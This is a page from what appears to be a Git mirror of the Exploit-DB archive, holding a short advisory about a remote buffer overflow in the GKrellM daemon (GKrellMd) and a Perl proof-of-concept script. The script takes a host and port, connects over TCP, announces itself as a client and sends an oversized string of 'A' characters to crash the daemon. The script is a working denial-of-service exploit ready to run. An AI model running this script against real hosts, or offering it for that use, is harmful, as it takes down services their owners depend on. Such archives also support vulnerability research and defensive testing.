bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/freebsd/dos/22831.pl
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

40 lines
No EOL
1.2 KiB
Perl
Executable file
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/8022/info
GKrellMd has been reported prone to a remote buffer overflow vulnerability, arbitrary code execution is possible.
The issue presents itself due to a lack of sufficient bounds checking performed on network-based data. If data exceeding the maximum reserved memory buffer size is received arbitrary memory may be corrupted.
A remote attacker may ultimately exploit this issue remotely to seize control of the affected daemon and execute arbitrary code.
This vulnerability has been reported to affect Gkrellm 2.1.13.
#!/usr/bin/perl -s
use IO::Socket;
#
# proof of concept code
# tested: grkellmd 2.1.10
#
if(!$ARGV[0] || !$ARGV[1])
{ print "usage: ./gkrellmcrash.pl <host> <port>\n"; exit(-1); }
$host = $ARGV[0];
$port = $ARGV[1];
$exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
$socket = new IO::Socket::INET
(
Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
);
die "unable to connect to $host:$port ($!)\n" unless $socket;
print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have
sleep(1);
print $socket $exploitstring;
close($socket);
Reference in a new issue View git blame Copy permalink